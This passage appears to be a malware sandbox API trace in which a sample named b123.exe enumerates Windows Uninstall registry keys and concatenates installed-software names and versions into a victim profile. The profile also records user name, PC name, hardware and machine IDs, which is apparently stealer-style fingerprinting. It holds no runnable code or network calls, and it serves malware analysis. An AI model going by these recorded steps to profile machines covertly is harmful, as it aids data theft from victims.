Runtime - 12.0.21005 12.0.21005\nMicrosoft Visual C++ 2019 X86 Minimum Runtime - 14.25.28508 14.25.28508\nMicrosoft Visual C++ 2012 Redistributable (x86) - 11.0.61030 11.0.61030.0\nMicrosoft Visual C++ 2013 Redistributable (x64) - 12.0.30501 12.0.30501.0\nMicrosoft Visual C++ 2015-2019 Redistributable (x86) - 14.25.28508 14.25.28508.3\nMicrosoft Visual C++ 2015-2019 Redistributable (x64) - 14.25.28508 14.25.28508.3\nMicrosoft Visual C++ 2005 Redistributable 8.0.61001", lpString2="\n" | out: lpString1="Tag: Default\n\nIP: IP?\nCountry: Country?\n\nWorking Path: C:\\Users\\RDhJ0CNFevzX\\Desktop\\b123.exe\n\nLocal Time: 23/3/2022 4:48:41\nTimeZone: UTC1\n\nDisplay Language: en-US\nKeyboard Languages: English (United States)\n\nIs Laptop: No\nProcessor: Intel(R) Core(TM) i5-7500 CPU @ 3.40GHz\nInstalled RAM: 4096 MB\nOS: Windows 10 Pro (x64 Bit)\nVideocard: Microsoft Basic Display Adapter\nDisplay Resolution: 1440x900\n\nPC name: XC64ZB\nUser name: RDhJ0CNFevzX\nDomain name: ?\nMachineID: 03845cb8-7441-4a2f-8c0f-c90408af5778\nGUID: {c20d559d-6c9d-11eb-b0a3-806e6f6e6963}\n\nInstalled Software: \nMicrosoft Visual C++ 2019 X86 Additional Runtime - 14.25.28508 14.25.28508\nMicrosoft Visual C++ 2013 x86 Minimum Runtime - 12.0.21005 12.0.21005\nMicrosoft Visual C++ 2019 X86 Minimum Runtime - 14.25.28508 14.25.28508\nMicrosoft Visual C++ 2012 Redistributable (x86) - 11.0.61030 11.0.61030.0\nMicrosoft Visual C++ 2013 Redistributable (x64) - 12.0.30501 12.0.30501.0\nMicrosoft Visual C++ 2015-2019 Redistributable (x86) - 14.25.28508 14.25.28508.3\nMicrosoft Visual C++ 2015-2019 Redistributable (x64) - 14.25.28508 14.25.28508.3\nMicrosoft Visual C++ 2005 Redistributable 8.0.61001\n") returned="Tag: Default\n\nIP: IP?\nCountry: Country?\n\nWorking Path: C:\\Users\\RDhJ0CNFevzX\\Desktop\\b123.exe\n\nLocal Time: 23/3/2022 4:48:41\nTimeZone: UTC1\n\nDisplay Language: en-US\nKeyboard Languages: English (United States)\n\nIs Laptop: No\nProcessor: Intel(R) Core(TM) i5-7500 CPU @ 3.40GHz\nInstalled RAM: 4096 MB\nOS: Windows 10 Pro (x64 Bit)\nVideocard: Microsoft Basic Display Adapter\nDisplay Resolution: 1440x900\n\nPC name: XC64ZB\nUser name: RDhJ0CNFevzX\nDomain name: ?\nMachineID: 03845cb8-7441-4a2f-8c0f-c90408af5778\nGUID: {c20d559d-6c9d-11eb-b0a3-806e6f6e6963}\n\nInstalled Software: \nMicrosoft Visual C++ 2019 X86 Additional Runtime - 14.25.28508 14.25.28508\nMicrosoft Visual C++ 2013 x86 Minimum Runtime - 12.0.21005 12.0.21005\nMicrosoft Visual C++ 2019 X86 Minimum Runtime - 14.25.28508 14.25.28508\nMicrosoft Visual C++ 2012 Redistributable (x86) - 11.0.61030 11.0.61030.0\nMicrosoft Visual C++ 2013 Redistributable (x64) - 12.0.30501 12.0.30501.0\nMicrosoft Visual C++ 2015-2019 Redistributable (x86) - 14.25.28508 14.25.28508.3\nMicrosoft Visual C++ 2015-2019 Redistributable (x64) - 14.25.28508 14.25.28508.3\nMicrosoft Visual C++ 2005 Redistributable 8.0.61001\n" [0235.132] RegCloseKey (hKey=0x384) returned 0x0 [0235.132] RegEnumKeyExA (in: hKey=0x388, dwIndex=0x1c, lpName=0x1983bc, lpcchName=0x197fac, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="{90160000-008C-0000-0000-0000000FF1CE}", lpcchName=0x197fac, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0 [0235.132] wsprintfA (in: param_1=0x197fbc, param_2="%s\\%s" | out: param_1="SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Uninstall\\{90160000-008C-0000-0000-0000000FF1CE}") returned 90 [0235.132] RegOpenKeyExA (in: hKey=0x80000002, lpSubKey="SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Uninstall\\{90160000-008C-0000-0000-0000000FF1CE}", ulOptions=0x0, samDesired=0x20019, phkResult=0x197fb8 | out: phkResult=0x197fb8*=0x384) returned 0x0 [0235.132] RegQueryValueExA (in: hKey=0x384, lpValueName="DisplayName", lpReserved=0x0, lpType=0x1987c0, lpData=0x197bac, lpcbData=0x197fac*=0x400 | out: lpType=0x1987c0*=0x1, lpData="Office 16 Click-to-Run Extensibility Component", lpcbData=0x197fac*=0x2f) returned 0x0 [0235.133] lstrlenA (lpString="Office 16 Click-to-Run Extensibility Component") returned 46 [0235.133] lstrcatA (in: lpString1="Tag: Default\n\nIP: IP?\nCountry: Country?\n\nWorking Path: C:\\Users\\RDhJ0CNFevzX\\Desktop\\b123.exe\n\nLocal Time: 23/3/2022 4:48:41\nTimeZone: UTC1\n\nDisplay Language: en-US\nKeyboard Languages: English (United States)\n\nIs Laptop: No\nProcessor: Intel(R) Core(TM) i5-7500 CPU @ 3.40GHz\nInstalled RAM: 4096 MB\nOS: Windows 10 Pro (x64 Bit)\nVideocard: Microsoft Basic Display Adapter\nDisplay Resolution: 1440x900\n\nPC name: XC64ZB\nUser name: RDhJ0CNFevzX\nDomain name: ?\nMachineID: 03845cb8-7441-4a2f-8c0f-c90408af5778\nGUID: {c20d559d-6c9d-11eb-b0a3-806e6f6e6963}\n\nInstalled Software: \nMicrosoft Visual C++ 2019 X86 Additional Runtime - 14.25.28508 14.25.28508\nMicrosoft Visual C++ 2013 x86 Minimum Runtime - 12.0.21005 12.0.21005\nMicrosoft Visual C++ 2019 X86 Minimum Runtime - 14.25.28508 14.25.28508\nMicrosoft Visual C++ 2012 Redistributable (x86) - 11.0.61030 11.0.61030.0\nMicrosoft Visual C++ 2013 Redistributable (x64) - 12.0.30501 12.0.30501.0\nMicrosoft Visual C++ 2015-2019 Redistributable (x86) - 14.25.28508 14.25.28508.3\nMicrosoft Visual C++ 2015-2019 Redistributable (x64) - 14.25.28508 14.25.28508.3\nMicrosoft Visual C++ 2005 Redistributable 8.0.61001\n", lpString2="Office 16 Click-to-Run Extensibility Component" | out: lpString1="Tag: Default\n\nIP: IP?\nCountry: Country?\n\nWorking Path: C:\\Users\\RDhJ0CNFevzX\\Desktop\\b123.exe\n\nLocal Time: 23/3/2022 4:48:41\nTimeZone: UTC1\n\nDisplay Language: en-US\nKeyboard Languages: English (United States)\n\nIs Laptop: No\nProcessor: Intel(R) Core(TM) i5-7500 CPU @ 3.40GHz\nInstalled RAM: 4096 MB\nOS: Windows 10 Pro (x64 Bit)\nVideocard: Microsoft Basic Display Adapter\nDisplay Resolution: 1440x900\n\nPC name: XC64ZB\nUser name: RDhJ0CNFevzX\nDomain name: ?\nMachineID: 03845cb8-7441-4a2f-8c0f-c90408af5778\nGUID: {c20d559d-6c9d-11eb-b0a3-806e6f6e6963}\n\nInstalled Software: \nMicrosoft Visual C++ 2019 X86 Additional Runtime - 14.25.28508 14.25.28508\nMicrosoft Visual C++ 2013 x86 Minimum Runtime - 12.0.21005 12.0.21005\nMicrosoft Visual C++ 2019 X86 Minimum Runtime - 14.25.28508 14.25.28508\nMicrosoft Visual C++ 2012 Redistributable (x86) - 11.0.61030 11.0.61030.0\nMicrosoft Visual C++ 2013 Redistributable (x64) - 12.0.30501 12.0.30501.0\nMicrosoft Visual C++ 2015-2019 Redistributable (x86) - 14.25.28508 14.25.28508.3\nMicrosoft Visual C++ 2015-2019 Redistributable (x64) - 14.25.28508 14.25.28508.3\nMicrosoft Visual C++ 2005 Redistributable 8.0.61001\nOffice 16 Click-to-Run Extensibility Component") returned="Tag: Default\n\nIP: IP?\nCountry: Country?\n\nWorking Path: C:\\Users\\RDhJ0CNFevzX\\Desktop\\b123.exe\n\nLocal Time: 23/3/2022 4:48:41\nTimeZone: UTC1\n\nDisplay Language: en-US\nKeyboard Languages: English (United States)\n\nIs Laptop: No\nProcessor: Intel(R) Core(TM) i5-7500 CPU @ 3.40GHz\nInstalled RAM: 4096 MB\nOS: Windows 10 Pro (x64 Bit)\nVideocard: Microsoft Basic Display Adapter\nDisplay Resolution: 1440x900\n\nPC name: XC64ZB\nUser name: RDhJ0CNFevzX\nDomain name: ?\nMachineID: 03845cb8-7441-4a2f-8c0f-c90408af5778\nGUID: {c20d559d-6c9d-11eb-b0a3-806e6f6e6963}\n\nInstalled Software: \nMicrosoft Visual C++ 2019 X86 Additional Runtime - 14.25.28508 14.25.28508\nMicrosoft Visual C++ 2013 x86 Minimum Runtime - 12.0.21005 12.0.21005\nMicrosoft Visual C++ 2019 X86 Minimum Runtime - 14.25.28508 14.25.28508\nMicrosoft Visual C++ 2012 Redistributable (x86) - 11.0.61030 11.0.61030.0\nMicrosoft Visual C++ 2013 Redistributable (x64) - 12.0.30501 12.0.30501.0\nMicrosoft Visual C++ 2015-2019 Redistributable (x86) - 14.25.28508 14.25.28508.3\nMicrosoft Visual C++ 2015-2019 Redistributable (x64) - 14.25.28508 14.25.28508.3\nMicrosoft Visual C++ 2005 Redistributable 8.0.61001\nOffice 16 Click-to-Run Extensibility Component" [0235.133] RegQueryValueExA (in: hKey=0x384, lpValueName="DisplayVersion", lpReserved=0x0, lpType=0x1987c0, lpData=0x197bac, lpcbData=0x197fac*=0x400 | out: lpType=0x1987c0*=0x1, lpData="16.0.4266.1003", lpcbData=0x197fac*=0xf) returned 0x0 [0235.133] lstrcatA (in: lpString1="Tag: Default\n\nIP: IP?\nCountry: Country?\n\nWorking Path: C:\\Users\\RDhJ0CNFevzX\\Desktop\\b123.exe\n\nLocal Time: 23/3/2022 4:48:41\nTimeZone: UTC1\n\nDisplay Language: en-US\nKeyboard Languages: English (United States)\n\nIs Laptop: No\nProcessor: Intel(R) Core(TM) i5-7500 CPU @ 3.40GHz\nInstalled RAM: 4096 MB\nOS: Windows 10 Pro (x64 Bit)\nVideocard: Microsoft Basic Display Adapter\nDisplay Resolution: 1440x900\n\nPC name: XC64ZB\nUser name: RDhJ0CNFevzX\nDomain name: ?\nMachineID: 03845cb8-7441-4a2f-8c0f-c90408af5778\nGUID: {c20d559d-6c9d-11eb-b0a3-806e6f6e6963}\n\nInstalled Software: \nMicrosoft Visual C++ 2019 X86 Additional Runtime - 14.25.28508 14.25.28508\nMicrosoft Visual C++ 2013 x86 Minimum Runtime - 12.0.21005 12.0.21005\nMicrosoft Visual C++ 2019 X86 Minimum Runtime - 14.25.28508 14.25.28508\nMicrosoft Visual C++ 2012 Redistributable (x86) - 11.0.61030 11.0.61030.0\nMicrosoft Visual C++ 2013 Redistributable (x64) - 12.0.30501 12.0.30501.0\nMicrosoft Visual C++ 2015-2019 Redistributable (x86) - 14.25.28508 14.25.28508.3\nMicrosoft Visual C++ 2015-2019 Redistributable (x64) - 14.25.28508 14.25.28508.3\nMicrosoft Visual C++ 2005 Redistributable 8.0.61001\nOffice 16 Click-to-Run Extensibility Component", lpString2=" " | out: lpString1="Tag: Default\n\nIP: IP?\nCountry: Country?\n\nWorking Path: C:\\Users\\RDhJ0CNFevzX\\Desktop\\b123.exe\n\nLocal Time: 23/3/2022 4:48:41\nTimeZone: UTC1\n\nDisplay Language: en-US\nKeyboard Languages: English (United States)\n\nIs Laptop: No\nProcessor: Intel(R) Core(TM) i5-7500 CPU @ 3.40GHz\nInstalled RAM: 4096 MB\nOS: Windows 10 Pro (x64 Bit)\nVideocard: Microsoft Basic Display Adapter\nDisplay Resolution: 1440x900\n\nPC name: XC64ZB\nUser name: RDhJ0CNFevzX\nDomain name: ?\nMachineID: 03845cb8-7441-4a2f-8c0f-c90408af5778\nGUID: {c20d559d-6c9d-11eb-b0a3-806e6f6e6963}\n\nInstalled Software: \nMicrosoft Visual C++ 2019 X86 Additional Runtime - 14.25.28508 14.25.28508\nMicrosoft Visual C++ 2013 x86 Minimum Runtime - 12.0.21005 12.0.21005\nMicrosoft Visual C++ 2019 X86 Minimum Runtime - 14.25.28508 14.25.28508\nMicrosoft Visual C++ 2012 Redistributable (x86) - 11.0.61030 11.0.61030.0\nMicrosoft Visual C++ 2013 Redistributable (x64) - 12.0.30501 12.0.30501.0\nMicrosoft Visual C++ 2015-2019 Redistributable (x86) - 14.25.28508 14.25.28508.3\nMicrosoft Visual C++ 2015-2019 Redistributable (x64) - 14.25.28508 14.25.28508.3\nMicrosoft Visual C++ 2005 Redistributable 8.0.61001\nOffice 16 Click-to-Run Extensibility Component ") returned="Tag: Default\n\nIP: IP?\nCountry: Country?\n\nWorking Path: C:\\Users\\RDhJ0CNFevzX\\Desktop\\b123.exe\n\nLocal Time: 23/3/2022 4:48:41\nTimeZone: UTC1\n\nDisplay Language: en-US\nKeyboard Languages: English (United States)\n\nIs Laptop: No\nProcessor: Intel(R) Core(TM) i5-7500 CPU @ 3.40GHz\nInstalled RAM: 4096 MB\nOS: Windows 10 Pro (x64 Bit)\nVideocard: Microsoft Basic Display Adapter\nDisplay Resolution: 1440x900\n\nPC name: XC64ZB\nUser name: RDhJ0CNFevzX\nDomain name: ?\nMachineID: 03845cb8-7441-4a2f-8c0f-c90408af5778\nGUID: {c20d559d-6c9d-11eb-b0a3-806e6f6e6963}\n\nInstalled Software: \nMicrosoft Visual C++ 2019 X86 Additional Runtime - 14.25.28508 14.25.28508\nMicrosoft Visual C++ 2013 x86 Minimum Runtime - 12.0.21005 12.0.21005\nMicrosoft Visual C++ 2019 X86 Minimum Runtime - 14.25.28508 14.25.28508\nMicrosoft Visual C++ 2012 Redistributable (x86) - 11.0.61030 11.0.61030.0\nMicrosoft Visual C++ 2013 Redistributable (x64) - 12.0.30501 12.0.30501.0\nMicrosoft Visual C++ 2015-2019 Redistributable (x86) - 14.25.28508 14.25.28508.3\nMicrosoft Visual C++ 2015-2019 Redistributable (x64) - 14.25.28508 14.25.28508.3\nMicrosoft Visual C++ 2005 Redistributable 8.0.61001\nOffice 16 Click-to-Run Extensibility Component " [0235.133] lstrcatA (in: lpString1="Tag: Default\n\nIP: IP?\nCountry: Country?\n\nWorking Path: C:\\Users\\RDhJ0CNFevzX\\Desktop\\b123.exe\n\nLocal Time: 23/3/2022 4:48:41\nTimeZone: UTC1\n\nDisplay Language: en-US\nKeyboard Languages: English (United States)\n\nIs Laptop: No\nProcessor: Intel(R) Core(TM) i5-7500 CPU @ 3.40GHz\nInstalled RAM: 4096 MB\nOS: Windows 10 Pro (x64 Bit)\nVideocard: Microsoft Basic Display Adapter\nDisplay Resolution: 1440x900\n\nPC name: XC64ZB\nUser name: RDhJ0CNFevzX\nDomain name: ?\nMachineID: 03845cb8-7441-4a2f-8c0f-c90408af5778\nGUID: {c20d559d-6c9d-11eb-b0a3-806e6f6e6963}\n\nInstalled Software: \nMicrosoft Visual C++ 2019 X86 Additional Runtime - 14.25.28508 14.25.28508\nMicrosoft Visual C++ 2013 x86 Minimum Runtime - 12.0.21005 12.0.21005\nMicrosoft Visual C++ 2019 X86 Minimum Runtime - 14.25.28508 14.25.28508\nMicrosoft Visual C++ 2012 Redistributable (x86) - 11.0.61030 11.0.61030.0\nMicrosoft Visual C++ 2013 Redistributable (x64) - 12.0.30501 12.0.30501.0\nMicrosoft Visual C++ 2015-2019 Redistributable (x86) - 14.25.28508 14.25.28508.3\nMicrosoft Visual C++ 2015-2019 Redistributable (x64) - 14.25.28508 14.25.28508.3\nMicrosoft Visual C++ 2005 Redistributable 8.0.61001\nOffice 16 Click-to-Run Extensibility Component ", lpString2="16.0.4266.1003" | out: lpString1="Tag: Default\n\nIP: IP?\nCountry: Country?\n\nWorking Path: C:\\Users\\RDhJ0CNFevzX\\Desktop\\b123.exe\n\nLocal Time: 23/3/2022 4:48:41\nTimeZone: UTC1\n\nDisplay Language: en-US\nKeyboard Languages: English (United States)\n\nIs Laptop: No\nProcessor: Intel(R) Core(TM) i5-7500 CPU @ 3.40GHz\nInstalled RAM: 4096 MB\nOS: Windows 10 Pro (x64 Bit)\nVideocard: Microsoft Basic Display Adapter\nDisplay Resolution: 1440x900\n\nPC name: XC64ZB\nUser name: RDhJ0CNFevzX\nDomain name: ?\nMachineID: 03845cb8-7441-4a2f-8c0f-c90408af5778\nGUID: {c20d559d-6c9d-11eb-b0a3-806e6f6e6963}\n\nInstalled Software: \nMicrosoft Visual C++ 2019 X86 Additional Runtime - 14.25.28508 14.25.28508\nMicrosoft Visual C++ 2013 x86 Minimum Runtime - 12.0.21005 12.0.21005\nMicrosoft Visual C++ 2019 X86 Minimum Runtime - 14.25.28508 14.25.28508\nMicrosoft Visual C++ 2012 Redistributable (x86) - 11.0.61030 11.0.61030.0\nMicrosoft Visual C++ 2013 Redistributable (x64) - 12.0.30501 12.0.30501.0\nMicrosoft Visual C++ 2015-2019 Redistributable (x86) - 14.25.28508 14.25.28508.3\nMicrosoft Visual C++ 2015-2019 Redistributable (x64) - 14.25.28508 14.25.28508.3\nMicrosoft Visual C++ 2005 Redistributable 8.0.61001\nOffice 16 Click-to-Run Extensibility Component 16.0.4266.1003") returned="Tag: Default\n\nIP: IP?\nCountry: Country?\n\nWorking Path: C:\\Users\\RDhJ0CNFevzX\\Desktop\\b123.exe\n\nLocal Time: 23/3/2022 4:48:41\nTimeZone: UTC1\n\nDisplay Language: en-US\nKeyboard Languages: English (United States)\n\nIs Laptop: No\nProcessor: Intel(R) Core(TM) i5-7500 CPU @ 3.40GHz\nInstalled RAM: 4096 MB\nOS: Windows 10 Pro (x64 Bit)\nVideocard: Microsoft Basic Display Adapter\nDisplay Resolution: 1440x900\n\nPC name: XC64ZB\nUser name: RDhJ0CNFevzX\nDomain name: ?\nMachineID: 03845cb8-7441-4a2f-8c0f-c90408af5778\nGUID: {c20d559d-6c9d-11eb-b0a3-806e6f6e6963}\n\nInstalled Software: \nMicrosoft Visual C++ 2019 X86 Additional Runtime - 14.25.28508 14.25.28508\nMicrosoft Visual C++ 2013 x86 Minimum Runtime - 12.0.21005 12.0.21005\nMicrosoft Visual C++ 2019 X86 Minimum Runtime - 14.25.28508 14.25.28508\nMicrosoft Visual C++ 2012 Redistributable (x86) - 11.0.61030 11.0.61030.0\nMicrosoft Visual C++ 2013 Redistributable (x64) - 12.0.30501 12.0.30501.0\nMicrosoft Visual C++ 2015-2019 Redistributable (x86) - 14.25.28508 14.25.28508.3\nMicrosoft Visual C++ 2015-2019 Redistributable (x64) - 14.25.28508 14.25.28508.3\nMicrosoft Visual C++ 2005 Redistributable 8.0.61001\nOffice 16 Click-to-Run Extensibility Component 16.0.4266.1003" [0235.133] lstrcatA (in: lpString1="Tag: Default\n\nIP: IP?\nCountry: Country?\n\nWorking Path: C:\\Users\\RDhJ0CNFevzX\\Desktop\\b123.exe\n\nLocal Time: 23/3/2022 4:48:41\nTimeZone: UTC1\n\nDisplay Language: en-US\nKeyboard Languages: English (United States)\n\nIs Laptop: No\nProcessor: Intel(R) Core(TM) i5-7500 CPU @ 3.40GHz\nInstalled RAM: 4096 MB\nOS: Windows 10 Pro (x64 Bit)\nVideocard: Microsoft Basic Display Adapter\nDisplay Resolution: 1440x900\n\nPC name: XC64ZB\nUser name: RDhJ0CNFevzX\nDomain name: ?\nMachineID: 03845cb8-7441-4a2f-8c0f-c90408af5778\nGUID: {c20d559d-6c9d-11eb-b0a3-806e6f6e6963}\n\nInstalled Software: \nMicrosoft Visual C++ 2019 X86 Additional Runtime - 14.25.28508 14.25.28508\nMicrosoft Visual C++ 2013 x86 Minimum Runtime - 12.0.21005 12.0.21005\nMicrosoft Visual C++ 2019 X86 Minimum Runtime - 14.25.28508 14.25.28508\nMicrosoft Visual C++ 2012 Redistributable (x86) - 11.0.61030 11.0.61030.0\nMicrosoft Visual C++ 2013 Redistributable (x64) - 12.0.30501 12.0.30501.0\nMicrosoft Visual C++ 2015-2019 Redistributable (x86) - 14.25.28508 14.25.28508.3\nMicrosoft Visual C++ 2015-2019 Redistributable (x64) - 14.25.28508 14.25.28508.3\nMicrosoft Visual C++ 2005 Redistributable 8.0.61001\nOffice 16 Click-to-Run Extensibility Component 16.0.4266.1003", lpString2="\n" | out: lpString1="Tag: Default\n\nIP: IP?\nCountry: Country?\n\nWorking Path: C:\\Users\\RDhJ0CNFevzX\\Desktop\\b123.exe\n\nLocal Time: 23/3/2022 4:48:41\nTimeZone: UTC1\n\nDisplay Language: en-US\nKeyboard Languages: English (United States)\n\nIs Laptop: No\nProcessor: Intel(R) Core(TM) i5-7500 CPU @ 3.40GHz\nInstalled RAM: 4096 MB\nOS: Windows 10 Pro (x64 Bit)\nVideocard: Microsoft Basic Display Adapter\nDisplay Resolution: 1440x900\n\nPC name: XC64ZB\nUser name: RDhJ0CNFevzX\nDomain name: ?\nMachineID: 03845cb8-7441-4a2f-8c0f-c90408af5778\nGUID: {c20d559d-6c9d-11eb-b0a3-806e6f6e6963}\n\nInstalled Software: \nMicrosoft Visual C++ 2019 X86 Additional Runtime - 14.25.28508 14.25.28508\nMicrosoft Visual C++ 2013 x86 Minimum Runtime - 12.0.21005 12.0.21005\nMicrosoft Visual C++ 2019 X86 Minimum Runtime - 14.25.28508 14.25.28508\nMicrosoft Visual C++ 2012 Redistributable (x86) - 11.0.61030 11.0.61030.0\nMicrosoft Visual C++ 2013 Redistributable (x64) - 12.0.30501 12.0.30501.0\nMicrosoft Visual C++ 2015-2019 Redistributable (x86) - 14.25.28508 14.25.28508.3\nMicrosoft Visual C++ 2015-2019 Redistributable (x64) - 14.25.28508 14.25.28508.3\nMicrosoft Visual C++ 2005 Redistributable 8.0.61001\nOffice 16 Click-to-Run Extensibility Component 16.0.4266.1003\n") returned="Tag: Default\n\nIP: IP?\nCountry: Country?\n\nWorking Path: C:\\Users\\RDhJ0CNFevzX\\Desktop\\b123.exe\n\nLocal Time: 23/3/2022 4:48:41\nTimeZone: UTC1\n\nDisplay Language: en-US\nKeyboard Languages: English (United States)\n\nIs Laptop: No\nProcessor: Intel(R) Core(TM) i5-7500 CPU @ 3.40GHz\nInstalled RAM: 4096 MB\nOS: Windows 10 Pro (x64 Bit)\nVideocard: Microsoft Basic Display Adapter\nDisplay Resolution: 1440x900\n\nPC name: XC64ZB\nUser name: RDhJ0CNFevzX\nDomain name: ?\nMachineID: 03845cb8-7441-4a2f-8c0f-c90408af5778\nGUID: {c20d559d-6c9d-11eb-b0a3-806e6f6e6963}\n\nInstalled Software: \nMicrosoft Visual C++ 2019 X86 Additional Runtime - 14.25.28508 14.25.28508\nMicrosoft Visual C++ 2013 x86 Minimum Runtime - 12.0.21005 12.0.21005\nMicrosoft Visual C++ 2019 X86 Minimum Runtime - 14.25.28508 14.25.28508\nMicrosoft Visual C++ 2012 Redistributable (x86) - 11.0.61030 11.0.61030.0\nMicrosoft Visual C++ 2013 Redistributable (x64) - 12.0.30501 12.0.30501.0\nMicrosoft Visual C++ 2015-2019 Redistributable (x86) - 14.25.28508 14.25.28508.3\nMicrosoft Visual C++ 2015-2019 Redistributable (x64) - 14.25.28508 14.25.28508.3\nMicrosoft Visual C++ 2005 Redistributable 8.0.61001\nOffice 16 Click-to-Run Extensibility Component 16.0.4266.1003\n" [0235.133] RegCloseKey (hKey=0x384) returned 0x0 [0235.133] RegEnumKeyExA (in: hKey=0x388, dwIndex=0x1d, lpName=0x1983bc, lpcchName=0x197fac, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="{90160000-008C-0409-0000-0000000FF1CE}", lpcchName=0x197fac, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0 [0235.133] wsprintfA (in: param_1=0x197fbc, param_2="%s\\%s" | out: param_1="SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Uninstall\\{90160000-008C-0409-0000-0000000FF1CE}") returned 90 [0235.133] RegOpenKeyExA (in: hKey=0x80000002, lpSubKey="SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Uninstall\\{90160000-008C-0409-0000-0000000FF1CE}", ulOptions=0x0, samDesired=0x20019, phkResult=0x197fb8 | out: phkResult=0x197fb8*=0x384) returned 0x0 [0235.133] RegQueryValueExA (in: hKey=0x384, lpValueName="DisplayName", lpReserved=0x0, lpType=0x1987c0, lpData=0x197bac, lpcbData=0x197fac*=0x400 | out: lpType=0x1987c0*=0x1, lpData="Office 16 Click-to-Run Localization Component", lpcbData=0x197fac*=0x2e) returned 0x0 [0235.134] lstrlenA (lpString="Office 16 Click-to-Run Localization Component") returned 45 [0235.134] lstrcatA (in: lpString1="Tag: Default\n\nIP: IP?\nCountry: Country?\n\nWorking Path: C:\\Users\\RDhJ0CNFevzX\\Desktop\\b123.exe\n\nLocal Time: 23/3/2022 4:48:41\nTimeZone: UTC1\n\nDisplay Language: en-US\nKeyboard Languages: English (United States)\n\nIs Laptop: No\nProcessor: Intel(R) Core(TM) i5-7500 CPU @ 3.40GHz\nInstalled RAM: 4096 MB\nOS: Windows 10 Pro (x64 Bit)\nVideocard: Microsoft Basic Display Adapter\nDisplay Resolution: 1440x900\n\nPC name: XC64ZB\nUser name: RDhJ0CNFevzX\nDomain name: ?\nMachineID: 03845cb8-7441-4a2f-8c0f-c90408af5778\nGUID: {c20d559d-6c9d-11eb-b0a3-806e6f6e6963}\n\nInstalled Software: \nMicrosoft Visual C++ 2019 X86 Additional Runtime - 14.25.28508 14.25.28508\nMicrosoft Visual C++ 2013 x86 Minimum Runtime - 12.0.21005 12.0.21005\nMicrosoft Visual C++ 2019 X86 Minimum Runtime - 14.25.28508 14.25.28508\nMicrosoft Visual C++ 2012 Redistributable (x86) - 11.0.61030 11.0.61030.0\nMicrosoft Visual C++ 2013 Redistributable (x64) - 12.0.30501 12.0.30501.0\nMicrosoft Visual C++ 2015-2019 Redistributable (x86) - 14.25.28508 14.25.28508.3\nMicrosoft Visual C++ 2015-2019 Redistributable (x64) - 14.25.28508 14.25.28508.3\nMicrosoft Visual C++ 2005 Redistributable 8.0.61001\nOffice 16 Click-to-Run Extensibility Component 16.0.4266.1003\n", lpString2="Office 16 Click-to-Run Localization Component" | out: lpString1="Tag: Default\n\nIP: IP?\nCountry: Country?\n\nWorking Path: C:\\Users\\RDhJ0CNFevzX\\Desktop\\b123.exe\n\nLocal Time: 23/3/2022 4:48:41\nTimeZone: UTC1\n\nDisplay Language: en-US\nKeyboard Languages: English (United States)\n\nIs Laptop: No\nProcessor: Intel(R) Core(TM) i5-7500 CPU @ 3.40GHz\nInstalled RAM: 4096 MB\nOS: Windows 10 Pro (x64 Bit)\nVideocard: Microsoft Basic Display Adapter\nDisplay Resolution: 1440x900\n\nPC name: XC64ZB\nUser name: RDhJ0CNFevzX\nDomain name: ?\nMachineID: 03845cb8-7441-4a2f-8c0f-c90408af5778\nGUID: {c20d559d-6c9d-11eb-b0a3-806e6f6e6963}\n\nInstalled Software: \nMicrosoft Visual C++ 2019 X86 Additional Runtime - 14.25.28508 14.25.28508\nMicrosoft Visual C++ 2013 x86 Minimum Runtime - 12.0.21005 12.0.21005\nMicrosoft Visual C++ 2019 X86 Minimum Runtime - 14.25.28508 14.25.28508\nMicrosoft Visual C++ 2012 Redistributable (x86) - 11.0.61030 11.0.61030.0\nMicrosoft Visual C++ 2013 Redistributable (x64) - 12.0.30501 12.0.30501.0\nMicrosoft Visual C++ 2015-2019 Redistributable (x86) - 14.25.28508 14.25.28508.3\nMicrosoft Visual C++ 2015-2019 Redistributable (x64) - 14.25.28508 14.25.28508.3\nMicrosoft Visual C++ 2005 Redistributable 8.0.61001\nOffice 16 Click-to-Run Extensibility Component 16.0.4266.1003\nOffice 16 Click-to-Run Localization Component") returned="Tag: Default\n\nIP: IP?\nCountry: Country?\n\nWorking Path: C:\\Users\\RDhJ0CNFevzX\\Desktop\\b123.exe\n\nLocal Time: 23/3/2022 4:48:41\nTimeZone: UTC1\n\nDisplay Language: en-US\nKeyboard Languages: English (United States)\n\nIs Laptop: No\nProcessor: Intel(R) Core(TM) i5-7500 CPU @ 3.40GHz\nInstalled RAM: 4096 MB\nOS: Windows 10 Pro (x64 Bit)\nVideocard: Microsoft Basic Display Adapter\nDisplay Resolution: 1440x900\n\nPC name: XC64ZB\nUser name: RDhJ0CNFevzX\nDomain name: ?\nMachineID: 03845cb8-7441-4a2f-8c0f-c90408af5778\nGUID: {c20d559d-6c9d-11eb-b0a3-806e6f6e6963}\n\nInstalled Software: \nMicrosoft Visual C++ 2019 X86 Additional Runtime - 14.25.28508 14.25.28508\nMicrosoft Visual C++ 2013 x86 Minimum Runtime - 12.0.21005 12.0.21005\nMicrosoft Visual C++ 2019 X86 Minimum Runtime - 14.25.28508 14.25.28508\nMicrosoft Visual C++ 2012 Redistributable (x86) - 11.0.61030 11.0.61030.0\nMicrosoft Visual C++ 2013 Redistributable (x64) - 12.0.30501 12.0.30501.0\nMicrosoft Visual C++ 2015-2019 Redistributable (x86) - 14.25.28508 14.25.28508.3\nMicrosoft Visual C++ 2015-2019 Redistributable (x64) - 14.25.28508 14.25.28508.3\nMicrosoft Visual C++ 2005 Redistributable 8.0.61001\nOffice 16 Click-to-Run Extensibility Component 16.0.4266.1003\nOffice 16 Click-to-Run Localization Component" [0235.134] RegQueryValueExA (in: hKey=0x384, lpValueName="DisplayVersion", lpReserved=0x0, lpType=0x1987c0, lpData=0x197bac, lpcbData=0x197fac*=0x400 | out: lpType=0x1987c0*=0x1, lpData="16.0.4266.1003", lpcbData=0x197fac*=0xf) returned 0x0 [0235.134] lstrcatA (in: lpString1="Tag: Default\n\nIP: IP?\nCountry: Country?\n\nWorking Path: C:\\Users\\RDhJ0CNFevzX\\Desktop\\b123.exe\n\nLocal Time: 23/3/2022 